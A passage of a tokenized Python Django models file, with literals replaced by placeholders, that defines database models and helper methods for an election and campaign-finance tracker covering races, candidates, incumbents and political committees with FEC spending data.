) ) , help_text = "<STR_LIT>" ) <EOL> office_district = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> term_class = models . IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_name = models . CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_pty = models . CharField ( max_length = <NUM_LIT:3> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> incumbent_party = models . 
CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> next_election_date = models . DateField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> next_election_code = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = ELECTION_TYPE_CHOICES ) <EOL> special_election_scheduled = models . NullBooleanField ( default = False , null = True , help_text = "<STR_LIT>" ) <EOL> open_seat = models . NullBooleanField ( default = False , null = True , help_text = "<STR_LIT>" ) <EOL> dem_frac_historical = models . FloatField ( null = True , help_text = "<STR_LIT>" ) <EOL> rep_frac_historical = models . FloatField ( null = True , help_text = "<STR_LIT>" ) <EOL> altered_by_2010_redistricting = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> candidate_raised = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> candidate_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> coordinated_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outside_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> electioneering_spending = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> rothenberg_rating_id = models . 
IntegerField ( null = True ) <EOL> rothenberg_rating_text = models . CharField ( null = True , max_length = <NUM_LIT> , help_text = "<STR_LIT>" ) <EOL> rothenberg_update_time = models . DateTimeField ( null = True ) <EOL> district_notes = models . TextField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> general_is_decided = models . NullBooleanField ( default = False , null = True , help_text = "<STR_LIT>" ) <EOL> def get_district_fips ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return None <EOL> elif self . office == '<STR_LIT:H>' : <EOL> state_fips = STATES_FIPS_DICT [ self . state ] <EOL> district = self . office_district <EOL> district = district . zfill ( <NUM_LIT:2> ) <EOL> return state_fips + district <EOL> else : <EOL> return None <EOL> def rothenberg_rating_short ( self ) : <EOL> if self . rothenberg_rating_id == <NUM_LIT:9> : <EOL> return '<STR_LIT>' <EOL> elif self . rothenberg_rating_id == <NUM_LIT:5> : <EOL> return '<STR_LIT>' <EOL> return self . rothenberg_rating_text <EOL> def display_map ( self ) : <EOL> if self . office == '<STR_LIT:H>' : <EOL> if self . state not in [ '<STR_LIT>' ] : <EOL> return True <EOL> return False <EOL> def district_formatted ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return "<STR_LIT>" % ( self . state ) <EOL> elif self . office == '<STR_LIT:H>' : <EOL> if self . office_district : <EOL> return "<STR_LIT>" % ( self . state , self . office_district ) <EOL> else : <EOL> return "<STR_LIT:%s>" % ( self . state ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def get_rothenberg_link ( self ) : <EOL> state_slug = STATE_CHOICES_DICT [ self . state ] . lower ( ) . replace ( '<STR_LIT:U+0020>' , '<STR_LIT:->' ) <EOL> return "<STR_LIT>" + state_slug <EOL> def __unicode__ ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return "<STR_LIT>" % ( self . cycle , self . state , self . term_class ) <EOL> elif self . 
office == '<STR_LIT:H>' : <EOL> if self . office_district : <EOL> return "<STR_LIT>" % ( self . cycle , self . state , self . office_district ) <EOL> else : <EOL> return "<STR_LIT>" % ( self . cycle , self . state ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def get_absolute_url ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . term_class ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> url = "<STR_LIT>" <EOL> return url <EOL> def get_feed_url ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> url = "<STR_LIT>" % ( self . election_year , self . office , self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> url = "<STR_LIT>" % ( self . election_year , self . office , self . state , self . term_class ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> url = "<STR_LIT>" % ( self . election_year ) <EOL> return url <EOL> def race_name ( self ) : <EOL> name = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> name = "<STR_LIT>" % ( STATE_CHOICES_DICT [ self . state ] , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> name = "<STR_LIT>" % ( STATE_CHOICES_DICT [ self . state ] ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> name = "<STR_LIT>" <EOL> return name <EOL> def get_filtered_ie_url ( self ) : <EOL> return "<STR_LIT>" % self . pk <EOL> def next_election ( self ) : <EOL> if self . next_election_code : <EOL> return ELECTION_TYPE_DICT [ self . next_election_code ] <EOL> else : <EOL> return "<STR_LIT>" <EOL> class Meta : <EOL> ordering = [ '<STR_LIT:state>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> class Candidate_Overlay ( models . 
Model ) : <EOL> is_incumbent = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> curated_election_year = models . IntegerField ( null = True , help_text = "<STR_LIT>" ) <EOL> display = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> district = models . ForeignKey ( '<STR_LIT>' , null = True , help_text = "<STR_LIT>" ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> transparency_id = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> is_minor_candidate = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> not_seeking_reelection = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> other_office_sought = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> other_fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> pty = models . CharField ( max_length = <NUM_LIT:3> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> party = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> pcc = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> election_year = models . PositiveIntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> office = models . 
CharField ( max_length = <NUM_LIT:1> , null = True , <EOL> choices = ( ( '<STR_LIT:H>' , '<STR_LIT>' ) , ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:P>' , '<STR_LIT>' ) ) <EOL> ) <EOL> office_district = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> term_class = models . IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> bio_blurb = models . TextField ( null = True , blank = True , help_text = "<STR_LIT>" ) <EOL> cand_ici = models . CharField ( max_length = <NUM_LIT:1> , null = True , choices = ( ( '<STR_LIT:I>' , '<STR_LIT>' ) , ( '<STR_LIT:C>' , '<STR_LIT>' ) , ( '<STR_LIT:O>' , '<STR_LIT>' ) ) ) <EOL> candidate_status = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , choices = CANDIDATE_STATUS_CHOICES , help_text = "<STR_LIT>" ) <EOL> crp_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True ) <EOL> transparencydata_id = models . CharField ( max_length = <NUM_LIT> , default = '<STR_LIT>' , null = True ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:255> ) <EOL> total_expenditures = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> expenditures_supporting = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> expenditures_opposing = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> electioneering = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> cand_is_gen_winner = models . NullBooleanField ( null = True , verbose_name = "<STR_LIT>" , help_text = "<STR_LIT>" ) <EOL> is_general_candidate = models . NullBooleanField ( null = True , verbose_name = "<STR_LIT>" , help_text = "<STR_LIT>" ) <EOL> has_contributions = models . 
NullBooleanField ( null = True , default = False ) <EOL> total_receipts = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_contributions = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_disbursements = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> outstanding_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , default = <NUM_LIT:0> ) <EOL> total_unitemized = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> cash_on_hand = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> cash_on_hand_date = models . DateField ( null = True ) <EOL> cand_cand_contrib = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , help_text = "<STR_LIT>" ) <EOL> cand_cand_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , help_text = "<STR_LIT>" ) <EOL> class Meta : <EOL> unique_together = ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> def __unicode__ ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . name , self . party , self . state , self . cycle ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return '<STR_LIT>' % ( self . name , self . party , self . cycle ) <EOL> else : <EOL> return '<STR_LIT>' % ( self . name , self . party , self . state , self . office_district , self . cycle ) <EOL> def incumbency_status ( self ) : <EOL> if self . is_incumbent : <EOL> return "<STR_LIT:Y>" <EOL> else : <EOL> return "<STR_LIT:N>" <EOL> def is_electronic_filer ( self ) : <EOL> if self . 
office == '<STR_LIT:S>' : <EOL> return False <EOL> else : <EOL> return True <EOL> def detailed_office ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . state ) <EOL> elif self . office == '<STR_LIT:H>' : <EOL> return '<STR_LIT>' % ( self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def short_office ( self ) : <EOL> if self . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . state ) <EOL> elif self . office == '<STR_LIT:H>' : <EOL> return '<STR_LIT>' % ( self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return "<STR_LIT>" <EOL> def has_next_election ( self ) : <EOL> try : <EOL> if self . not_seeking_reelection or len ( self . candidate_status ) > <NUM_LIT:0> : <EOL> return False <EOL> except TypeError : <EOL> pass <EOL> return True <EOL> def get_absolute_url ( self ) : <EOL> return "<STR_LIT>" % ( self . cycle , self . slug , self . fec_id ) <EOL> def display_party ( self ) : <EOL> if ( self . party ) : <EOL> return "<STR_LIT>" % ( self . party . upper ( ) ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> def influence_explorer_url ( self ) : <EOL> if not self . transparencydata_id : <EOL> return None <EOL> return '<STR_LIT>' % ( self . slug , <EOL> self . transparencydata_id ) <EOL> def get_race_url ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . office == '<STR_LIT:H>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . office_district ) <EOL> elif self . office == '<STR_LIT:S>' : <EOL> url = "<STR_LIT>" % ( self . cycle , self . office , self . state , self . term_class ) <EOL> elif self . office == '<STR_LIT:P>' : <EOL> url = "<STR_LIT>" <EOL> return url <EOL> def get_filtered_ie_url ( self ) : <EOL> return "<STR_LIT>" % self . fec_id <EOL> def show_candidate_status ( self ) : <EOL> if self . 
cand_is_gen_winner and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> if self . cand_is_gen_winner == False and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> if self . candidate_status : <EOL> try : <EOL> return CANDIDATE_STATUS_DICT [ self . candidate_status ] <EOL> except KeyError : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" <EOL> def get_general_status ( self ) : <EOL> if self . cand_is_gen_winner == None and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> elif self . cand_is_gen_winner and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> elif not self . cand_is_gen_winner and self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> elif not self . is_general_candidate : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> class Incumbent ( models . Model ) : <EOL> is_incumbent = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> office = models . CharField ( max_length = <NUM_LIT:1> , null = True , <EOL> choices = ( ( '<STR_LIT:H>' , '<STR_LIT>' ) , ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:P>' , '<STR_LIT>' ) ) <EOL> ) <EOL> office_district = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> class Committee_Overlay ( models . Model ) : <EOL> cycle = models . CharField ( max_length = <NUM_LIT:4> ) <EOL> term_class = models . 
IntegerField ( blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> is_paper_filer = models . NullBooleanField ( null = True , default = False , help_text = "<STR_LIT>" ) <EOL> curated_candidate = models . ForeignKey ( '<STR_LIT>' , related_name = '<STR_LIT>' , null = True , help_text = "<STR_LIT>" ) <EOL> is_dirty = models . NullBooleanField ( null = True , default = True , help_text = "<STR_LIT>" ) <EOL> name = models . CharField ( max_length = <NUM_LIT:255> , help_text = "<STR_LIT>" ) <EOL> display_name = models . CharField ( max_length = <NUM_LIT:255> , null = True ) <EOL> fec_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , help_text = "<STR_LIT>" ) <EOL> slug = models . SlugField ( max_length = <NUM_LIT:255> ) <EOL> party = models . CharField ( max_length = <NUM_LIT:3> , blank = True , null = True ) <EOL> treasurer = models . CharField ( max_length = <NUM_LIT:200> , blank = True , null = True ) <EOL> street_1 = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True ) <EOL> street_2 = models . CharField ( max_length = <NUM_LIT> , blank = True , null = True ) <EOL> city = models . CharField ( max_length = <NUM_LIT:30> , blank = True , null = True ) <EOL> zip_code = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True ) <EOL> state = models . CharField ( max_length = <NUM_LIT:2> , blank = True , null = True , help_text = '<STR_LIT>' ) <EOL> connected_org_name = models . CharField ( max_length = <NUM_LIT:200> , blank = True , null = True ) <EOL> filing_frequency = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True ) <EOL> candidate_id = models . CharField ( max_length = <NUM_LIT:9> , blank = True , null = True ) <EOL> candidate_office = models . CharField ( max_length = <NUM_LIT:1> , blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> has_contributions = models . NullBooleanField ( null = True , default = False ) <EOL> total_receipts = models . 
DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_contributions = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> total_disbursements = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> outstanding_loans = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , blank = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_unitemized = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> cash_on_hand = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> cash_on_hand_date = models . DateField ( null = True , help_text = "<STR_LIT>" ) <EOL> has_independent_expenditures = models . NullBooleanField ( null = True , default = False ) <EOL> total_indy_expenditures = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , help_text = "<STR_LIT>" ) <EOL> ie_support_dems = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> ie_oppose_dems = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> ie_support_reps = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> ie_oppose_reps = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> , help_text = "<STR_LIT>" ) <EOL> total_presidential_indy_expenditures = models . 
DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> has_coordinated_expenditures = models . NullBooleanField ( null = True , default = False ) <EOL> total_coordinated_expenditures = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> has_electioneering = models . NullBooleanField ( null = True , default = False ) <EOL> total_electioneering = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True , default = <NUM_LIT:0> ) <EOL> is_superpac = models . NullBooleanField ( null = True , default = False ) <EOL> is_hybrid = models . NullBooleanField ( null = True , default = False ) <EOL> is_noncommittee = models . NullBooleanField ( null = True , default = False ) <EOL> org_status = models . CharField ( max_length = <NUM_LIT> , <EOL> choices = ( ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ) , <EOL> blank = True , null = True , help_text = "<STR_LIT>" ) <EOL> political_orientation = models . CharField ( max_length = <NUM_LIT:1> , null = True , help_text = "<STR_LIT>" , choices = [ <EOL> ( '<STR_LIT:R>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:B>' , '<STR_LIT>' ) , <EOL> ] ) <EOL> political_orientation_verified = models . BooleanField ( default = False , help_text = "<STR_LIT>" ) <EOL> designation = models . 
CharField ( max_length = <NUM_LIT:1> , <EOL> blank = False , <EOL> null = True , <EOL> choices = [ ( '<STR_LIT:A>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:P>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:B>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) ] <EOL> ) <EOL> ctype = models . CharField ( max_length = <NUM_LIT:1> , <EOL> blank = False , <EOL> help_text = "<STR_LIT>" , <EOL> null = True , <EOL> choices = [ ( '<STR_LIT:C>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:D>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:E>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:H>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:I>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:N>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:O>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:P>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:S>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:X>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT:Y>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ] ) <EOL> support_unclassified = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> oppose_unclassified = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> support_winners = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> oppose_winners = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> support_losers = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> oppose_losers = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> roi = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> objects = models . 
Manager ( ) <EOL> nulls_last_objects = NullsLastManager ( ) <EOL> class Meta : <EOL> unique_together = ( ( "<STR_LIT>" , "<STR_LIT>" ) , ) <EOL> ordering = ( '<STR_LIT>' , ) <EOL> def candidate_url ( self ) : <EOL> if self . curated_candidate : <EOL> return self . curated_candidate . get_absolute_url ( ) <EOL> else : <EOL> return None <EOL> def curated_candidate_name ( self ) : <EOL> if self . curated_candidate : <EOL> return '<STR_LIT>' % ( self . curated_candidate . name , self . curated_candidate . party ) <EOL> else : <EOL> return None <EOL> def display_coh_date ( self ) : <EOL> if self . ctype == '<STR_LIT:I>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return self . cash_on_hand_date <EOL> def display_coh ( self ) : <EOL> if self . ctype == '<STR_LIT:I>' : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return self . cash_on_hand <EOL> def is_electronic_filer ( self ) : <EOL> return self . is_paper_filer == False <EOL> def curated_candidate_office ( self ) : <EOL> if self . curated_candidate : <EOL> if self . curated_candidate . office == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' % ( self . curated_candidate . state ) <EOL> else : <EOL> return '<STR_LIT>' % ( self . curated_candidate . state , self . curated_candidate . office_district ) <EOL> else : <EOL> return None <EOL> def get_absolute_url ( self ) : <EOL> return ( "<STR_LIT>" % ( self . cycle , self . slug , self . fec_id ) ) <EOL> def get_cycle_url ( self , cycle ) : <EOL> return ( "<STR_LIT>" % ( cycle , self . slug , self . fec_id ) ) <EOL> def is_not_a_committee ( self ) : <EOL> if self . ctype == '<STR_LIT:I>' : <EOL> return True <EOL> return False <EOL> def neg_percent ( self ) : <EOL> if self . total_indy_expenditures == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return <NUM_LIT:100> * ( self . ie_oppose_reps + self . ie_oppose_dems ) / self . total_indy_expenditures <EOL> def pos_percent ( self ) : <EOL> if self . 
total_indy_expenditures == <NUM_LIT:0> : <EOL> return <NUM_LIT:0> <EOL> else : <EOL> return <NUM_LIT:100> * ( self . ie_support_reps + self . ie_support_dems ) / self . total_indy_expenditures <EOL> def __unicode__ ( self ) : <EOL> return self . name <EOL> def fec_all_filings ( self ) : <EOL> url = "<STR_LIT>" <EOL> if self . is_paper_filer : <EOL> url = "<STR_LIT>" % ( self . fec_id ) <EOL> else : <EOL> url = "<STR_LIT>" % ( self . fec_id ) <EOL> return url <EOL> def superpac_status ( self ) : <EOL> if ( self . is_superpac ) : <EOL> return '<STR_LIT:Y>' <EOL> else : <EOL> return '<STR_LIT:N>' <EOL> def hybrid_status ( self ) : <EOL> if ( self . is_hybrid ) : <EOL> return '<STR_LIT:Y>' <EOL> else : <EOL> return '<STR_LIT:N>' <EOL> def filing_frequency_text ( self ) : <EOL> if ( self . filing_frequency ) : <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT:M>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT:T>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> if ( self . filing_frequency . upper ( ) == '<STR_LIT:A>' ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> def display_type ( self ) : <EOL> key = self . ctype <EOL> returnval = '<STR_LIT>' <EOL> try : <EOL> returnval = type_hash [ key ] <EOL> except KeyError : <EOL> pass <EOL> if self . designation == '<STR_LIT:D>' : <EOL> returnval += "<STR_LIT>" <EOL> elif self . designation == '<STR_LIT>' : <EOL> returnval += "<STR_LIT>" <EOL> return returnval <EOL> def display_designation ( self ) : <EOL> key = self . designation <EOL> try : <EOL> return committee_designation_hash [ key ] <EOL> except KeyError : <EOL> return '<STR_LIT>' <EOL> def major_activity ( self ) : <EOL> if ( self . ie_oppose_dems or self . ie_oppose_reps or self . ie_support_dems or self . 
ie_support_reps ) : <EOL> activity_dict = { '<STR_LIT>' : self . ie_oppose_dems , '<STR_LIT>' : self . ie_oppose_reps , '<STR_LIT>' : self . ie_support_dems , '<STR_LIT>' : self . ie_support_reps } <EOL> activity_rank = sorted ( activity_dict . items ( ) , key = lambda ( k , v ) : ( v ) , reverse = True ) <EOL> return activity_rank [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> else : <EOL> return "<STR_LIT>" <EOL> def get_formatted_roi ( self ) : <EOL> return str ( self . roi * <NUM_LIT:100> ) + "<STR_LIT:%>" <EOL> def total_unclassified ( self ) : <EOL> return <NUM_LIT> + float ( self . support_unclassified or <NUM_LIT:0> ) + float ( self . oppose_unclassified or <NUM_LIT:0> ) <EOL> def get_ge_spending ( self ) : <EOL> return <NUM_LIT> + float ( self . support_winners or <NUM_LIT:0> ) + float ( self . oppose_winners or <NUM_LIT:0> ) + float ( self . support_losers or <NUM_LIT:0> ) + float ( self . oppose_losers or <NUM_LIT:0> ) + float ( self . support_unclassified or <NUM_LIT:0> ) + float ( self . oppose_unclassified or <NUM_LIT:0> ) <EOL> def get_pos_ge_spending ( self ) : <EOL> return <NUM_LIT> + float ( self . support_winners or <NUM_LIT:0> ) + float ( self . support_losers or <NUM_LIT:0> ) + float ( self . support_unclassified or <NUM_LIT:0> ) <EOL> def get_neg_ge_spending ( self ) : <EOL> return <NUM_LIT> + float ( self . oppose_winners or <NUM_LIT:0> ) + float ( self . oppose_losers or <NUM_LIT:0> ) + float ( self . oppose_unclassified or <NUM_LIT:0> ) <EOL> def 